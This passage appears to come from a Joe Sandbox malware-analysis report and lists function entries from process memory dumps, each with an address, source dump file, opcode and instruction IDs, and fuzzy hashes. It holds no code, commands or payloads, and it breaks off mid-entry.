                                                                                                                                  Function 00007FFD9BAD7D70 Relevance: .1, Instructions: 56COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9607bfc2a5c3f4b5f0e884544b91f60e0d10ff00969fbc98f7efdaf10b1cfa4b
                                                                                                                                  • Instruction ID: dfbcc0dc2d70896cd87b121984961216c8990e403d431e32b97dc875d70e4324
                                                                                                                                  • Opcode Fuzzy Hash: 9607bfc2a5c3f4b5f0e884544b91f60e0d10ff00969fbc98f7efdaf10b1cfa4b
                                                                                                                                  • Instruction Fuzzy Hash: 8901D62AB0E5550AD324B27C7CA68E53B50CFA523F70803F7E24DCE5A7DC08904A87D4
                                                                                                                                  Function 00007FFD9BAA0C40 Relevance: .1, Instructions: 51COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f99356922026e6e880ee7a92bad2d9d45a1a3b36c901df894e745226f9e58d5a
                                                                                                                                  • Instruction ID: 2fd90356b865a35136ea2973926417c0e99dfe7ab35acf3027c41e9a90ee891d
                                                                                                                                  • Opcode Fuzzy Hash: f99356922026e6e880ee7a92bad2d9d45a1a3b36c901df894e745226f9e58d5a
                                                                                                                                  • Instruction Fuzzy Hash: 8611A136A0E28D8FE722DFA888601DD7FB1EF42711F0645F7D048DB1A2D97466498764
                                                                                                                                  Function 00007FFD9BAD3693 Relevance: .0, Instructions: 50COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5651ca33e8d611be5e8cec21b06c4301865ff00d904338416f7df549bf7627ce
                                                                                                                                  • Instruction ID: 43663595fb94e75edc4dd87c1a9fae584f9d7f44b9ab6841a64d05736580f70d
                                                                                                                                  • Opcode Fuzzy Hash: 5651ca33e8d611be5e8cec21b06c4301865ff00d904338416f7df549bf7627ce
                                                                                                                                  • Instruction Fuzzy Hash: B8019232B1DA0A4BEB68DB58C4697A9B3D2FBD4310F164379D04EC72D5DE78B9818780
                                                                                                                                  Function 00007FFD9BADE1AD Relevance: .0, Instructions: 49COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 19def9a7db69bd2fea9d3a6f34a674aeb9b5588d97fe56784f45aa7666b38d07
                                                                                                                                  • Instruction ID: b0e6e3081be496f910f8c97b66204c98f67917dff3c7a24cf36e577077c1fdb6
                                                                                                                                  • Opcode Fuzzy Hash: 19def9a7db69bd2fea9d3a6f34a674aeb9b5588d97fe56784f45aa7666b38d07
                                                                                                                                  • Instruction Fuzzy Hash: B7015232F0542E4AEF64E79898653FD73E1EFE8311F064A76E009D7195DA68AA818780
                                                                                                                                  Function 00007FFD9BAA0C48 Relevance: .0, Instructions: 45COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2a26a3ebc4bc9e74145091e1032dcb3bb35e2874727d4901efe39f9149ec395b
                                                                                                                                  • Instruction ID: 29b7ff40235aed8ed58873bd8658f74a1c50275defc08408daf90b1810143e1e
                                                                                                                                  • Opcode Fuzzy Hash: 2a26a3ebc4bc9e74145091e1032dcb3bb35e2874727d4901efe39f9149ec395b
                                                                                                                                  • Instruction Fuzzy Hash: B4019235A0E38D9FE721DFA4C85049CBFB1EF02710F1641E7D048DB1A2D9746645C754
                                                                                                                                  Function 00007FFD9BAA0C50 Relevance: .0, Instructions: 40COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7332ddb06a322b94d9d1a086d782e2bd0ebfe3b8b6f5b591155510d7e2697513
                                                                                                                                  • Instruction ID: 3cddbe00afb4ff431c128674d65695716683e5987107ee65f5c6ba0062407818
                                                                                                                                  • Opcode Fuzzy Hash: 7332ddb06a322b94d9d1a086d782e2bd0ebfe3b8b6f5b591155510d7e2697513
                                                                                                                                  • Instruction Fuzzy Hash: 4201BC31A0E38D9FEB21DFA488A049CBFB1AF02700F1542E7D048CB2A3D9786A448754
                                                                                                                                  Function 00007FFD9BAD88AD Relevance: .0, Instructions: 38COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b0bc7bd19de957c656d4c1f70f952c63534e99dc7521a0c93103d3ec3a457ce7
                                                                                                                                  • Instruction ID: a062485ef70691557f72edf6e6b1847a2b5b20afc9384f58c100db5ba6bdc7be
                                                                                                                                  • Opcode Fuzzy Hash: b0bc7bd19de957c656d4c1f70f952c63534e99dc7521a0c93103d3ec3a457ce7
                                                                                                                                  • Instruction Fuzzy Hash: 7DF0342260E7C50FD31B173888754943FB0DE6316134A01E7C081CF1B3D85D888A8352
                                                                                                                                  Function 00007FFD9BAA0B77 Relevance: .0, Instructions: 34COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d89311434c9708ba25c6d473b2a50db4ece3f4970cc5127e1b5a28fbf1ec18f8
                                                                                                                                  • Instruction ID: aad96e1d7d97b683b76d1842787eed33bcf2f0f51b8489067d4b27900bf4e650
                                                                                                                                  • Opcode Fuzzy Hash: d89311434c9708ba25c6d473b2a50db4ece3f4970cc5127e1b5a28fbf1ec18f8
                                                                                                                                  • Instruction Fuzzy Hash: 88F0A03925EA49CFC742EB3DC8A58C4BB60FF02204B8A01FAD089CB5A2D3155C5ECB51
                                                                                                                                  Function 00007FFD9BADB909 Relevance: .0, Instructions: 33COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7b9d412235b02f3ebd63d2442816699b17ae80a3b16eb22797111223da92205b
                                                                                                                                  • Instruction ID: 5e7126f05cbdf4881c45ee340200cc1299084b3014dcb6f040ca477b80de1229
                                                                                                                                  • Opcode Fuzzy Hash: 7b9d412235b02f3ebd63d2442816699b17ae80a3b16eb22797111223da92205b
                                                                                                                                  • Instruction Fuzzy Hash: 6BF0E521B1DBC80FC769962D5866161BFF1DB9B20134A02EFC186CB6A3DD59AC898341
                                                                                                                                  Function 00007FFD9BACD959 Relevance: .0, Instructions: 31COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bac3000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 64a9c3bbb7f5388cf057e61f598ada5696dc9b997acc4e82ba8b3ca637a6e828
                                                                                                                                  • Instruction ID: 17befed0cbf27ab3611e07ed740970dfdafd5549d16128917ab4b55b2371d5a9
                                                                                                                                  • Opcode Fuzzy Hash: 64a9c3bbb7f5388cf057e61f598ada5696dc9b997acc4e82ba8b3ca637a6e828
                                                                                                                                  • Instruction Fuzzy Hash: 8DF0396161E3C44FD3139B3888254647FA0EA2720535B05FFD0CACB5B3D91A888AC312
                                                                                                                                  Function 00007FFD9BAC5899 Relevance: .0, Instructions: 28COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bac3000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2511c0cd162ab82a09539ce9218a0308195684e5ddb04a08e52280f0d002c50b
                                                                                                                                  • Instruction ID: e44cd981fd2c516034f56b95038df85d1624ca206207f788ae7247dee322d6e8
                                                                                                                                  • Opcode Fuzzy Hash: 2511c0cd162ab82a09539ce9218a0308195684e5ddb04a08e52280f0d002c50b
                                                                                                                                  • Instruction Fuzzy Hash: 07F0657164E3C44FCB16AB7488694557F60EF6721174A41EEC046CF1A3EA1DD845C711
                                                                                                                                  Function 00007FFD9BADB459 Relevance: .0, Instructions: 26COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f1dd106be1675b28366ec2004843c401d7150df9e67d420f988a9a43e725198e
                                                                                                                                  • Instruction ID: f35ba541a3b941cc13c9aaf341ebe6c6db9b7f5f07bdd7303d4c571ca020273c
                                                                                                                                  • Opcode Fuzzy Hash: f1dd106be1675b28366ec2004843c401d7150df9e67d420f988a9a43e725198e
                                                                                                                                  • Instruction Fuzzy Hash: 14E06D6160E3C48FCB1AAB34886D8547F60EE6720134A42EFC486CF1A7EA2D8885C712
                                                                                                                                  Function 00007FFD9BADB3C9 Relevance: .0, Instructions: 26COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: bdd82aecfe198bbd8299d29e473943b755042969cf24d6653dde3fc191fa275e
                                                                                                                                  • Instruction ID: e977cd1362a9d23ade79f9f437f1636cba2e7f455eba951d8196d6cc27200e2a
                                                                                                                                  • Opcode Fuzzy Hash: bdd82aecfe198bbd8299d29e473943b755042969cf24d6653dde3fc191fa275e
                                                                                                                                  • Instruction Fuzzy Hash: 30E0927060E3C44FC71AEB3488688547F60EF6B20134A42EFC045CF2A7EA2DC885C701
                                                                                                                                  Function 00007FFD9BAD29F9 Relevance: .0, Instructions: 26COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 861a552fa676ef2c39f2ebf40fd8b8f06f9107aafbcada9c16295871aef5436f
                                                                                                                                  • Instruction ID: 26fab0ef578798732123e5fe0a8b06ba9a773684830b40befe95939e059cf375
                                                                                                                                  • Opcode Fuzzy Hash: 861a552fa676ef2c39f2ebf40fd8b8f06f9107aafbcada9c16295871aef5436f
                                                                                                                                  • Instruction Fuzzy Hash: DEE06D3164E3C04FCB16AB3488688547F60AE6720174A42EEC086CF1A3DA2DC88AC701
                                                                                                                                  Function 00007FFD9BAC5A71 Relevance: .0, Instructions: 24COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bac3000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0eee5d3a3a32375f6dd06d586ec933c86634b1eb35b131c28d22c4b1caeee0c3
                                                                                                                                  • Instruction ID: 98562d136d9939b6fc75dcf4a82d6f57455fcc7103663bccb9c7407ad337187c
                                                                                                                                  • Opcode Fuzzy Hash: 0eee5d3a3a32375f6dd06d586ec933c86634b1eb35b131c28d22c4b1caeee0c3
                                                                                                                                  • Instruction Fuzzy Hash: 36E017A190F7C51FD70663B9082E0A4BFA0AD2721138E05EFC0CACB0B3D95E084A8302
                                                                                                                                  Function 00007FFD9BADB3E0 Relevance: .0, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                                  • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                                  • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                                  • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                                  Function 00007FFD9BAD2A89 Relevance: .0, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 177251aa6206ce8e389de9cc672da9d957a76d513835ee17510b0b1d03f5325e
                                                                                                                                  • Instruction ID: 40103d3a0a41b0dbd73d840d31fc3ea5f75458c10d5045f3bafa6584c678b927
                                                                                                                                  • Opcode Fuzzy Hash: 177251aa6206ce8e389de9cc672da9d957a76d513835ee17510b0b1d03f5325e
                                                                                                                                  • Instruction Fuzzy Hash: ACE01A7154A3C04FCB06AB7484A99843F709E6721078A41DEC049CF1B3D62E894AC701
                                                                                                                                  Function 00007FFD9BADB999 Relevance: .0, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e518833da54e11cddcfe44cfb65d0bbfe3a6227a6b51b4ae153cc8461314605b
                                                                                                                                  • Instruction ID: 4929fa9a8e8ba247497b108c220b0c488c8901d046e331d6e67b1d87e26d4ff2
                                                                                                                                  • Opcode Fuzzy Hash: e518833da54e11cddcfe44cfb65d0bbfe3a6227a6b51b4ae153cc8461314605b
                                                                                                                                  • Instruction Fuzzy Hash: E0E01A7154E3C48FCB06EB7488A59443F60AE6B21078B41EEC145CF1B3E62D8849C701
                                                                                                                                  Function 00007FFD9BAD8874 Relevance: .0, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 06f7bfe94e6c3545b098f8a879e5f3c834bb8bff79a6e01d6551a03bed15286b
                                                                                                                                  • Instruction ID: 13c2d47eb2b664cb2235ac0c066b1399d260a07b3aee49c551055595d5ff528b
                                                                                                                                  • Opcode Fuzzy Hash: 06f7bfe94e6c3545b098f8a879e5f3c834bb8bff79a6e01d6551a03bed15286b
                                                                                                                                  • Instruction Fuzzy Hash: 73E0653098F7C04FC70B873488B88887FB0EE4721474A80EEC0858B0A3DA298809C702
                                                                                                                                  Function 00007FFD9BADB470 Relevance: .0, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                                  • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                                                                                  • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                                                                                  • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                                                                                  Function 00007FFD9BADE3B9 Relevance: .0, Instructions: 21COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 216e1789ede4c91f2940022da9cd7851c4a85a69f1e1107e36a7de21cda560c3
                                                                                                                                  • Instruction ID: c2b01c04f928777a0e668d230f27660419bee7da6d3b12f1bd017861ce245802
                                                                                                                                  • Opcode Fuzzy Hash: 216e1789ede4c91f2940022da9cd7851c4a85a69f1e1107e36a7de21cda560c3
                                                                                                                                  • Instruction Fuzzy Hash: 5DE04F2154F3C04FC70B973088A88803F60DE2721034A40EAC145CF2B3E5298C49C711
                                                                                                                                  Function 00007FFD9BADE339 Relevance: .0, Instructions: 21COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 766aa0ce932918cdde308f6c22499ebc45b7553adf3843164fdbfc272c49b119
                                                                                                                                  • Instruction ID: 7a5d4e4c5c284cae1d0a98378bbaddce979002e6a2a82d53d0b2d228632deb92
                                                                                                                                  • Opcode Fuzzy Hash: 766aa0ce932918cdde308f6c22499ebc45b7553adf3843164fdbfc272c49b119
                                                                                                                                  • Instruction Fuzzy Hash: 23E0462294F3C44FC70B9B3088A88803F60DE6B21038A40EAC185CF2B3EA298C49C712
                                                                                                                                  Function 00007FFD9BAA5906 Relevance: .0, Instructions: 21COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 54b3bdfac85337088c07613df5ecb4cd6b6a46193c3aa62ab90cf3e95458920a
                                                                                                                                  • Instruction ID: d7e3dd96e30b9d43b5d2dc38ed30cab640a7ab2438f1c62fc4c931b52efdf37b
                                                                                                                                  • Opcode Fuzzy Hash: 54b3bdfac85337088c07613df5ecb4cd6b6a46193c3aa62ab90cf3e95458920a
                                                                                                                                  • Instruction Fuzzy Hash: 93E01230F0D11E8AF774A755D8607B962629F94704F5600B5D40ED32E2DDB86F418A55
                                                                                                                                  Function 00007FFD9BAC9573 Relevance: .0, Instructions: 19COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bac3000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e4e19d039b0a9099190469ed1c622cf1f9cca3ca4567e312521f1de2797030a8
                                                                                                                                  • Instruction ID: 6e311b00f20c60265b717284532c50aedc005be2e7fa535e4e4524cc8d20c7a0
                                                                                                                                  • Opcode Fuzzy Hash: e4e19d039b0a9099190469ed1c622cf1f9cca3ca4567e312521f1de2797030a8
                                                                                                                                  • Instruction Fuzzy Hash: B5D02B42B0584B06E70EB2198CB64F86352AF8D208FC941B4E00D4A2C6DF6C294B8340
                                                                                                                                  Function 00007FFD9BAD2AA0 Relevance: .0, Instructions: 18COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAD2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD2000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bad2000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                                  • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                                  • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                                  • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                                  Function 00007FFD9BAB3B20 Relevance: .0, Instructions: 18COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000013.00000002.2103119009.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_19_2_7ffd9bab0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
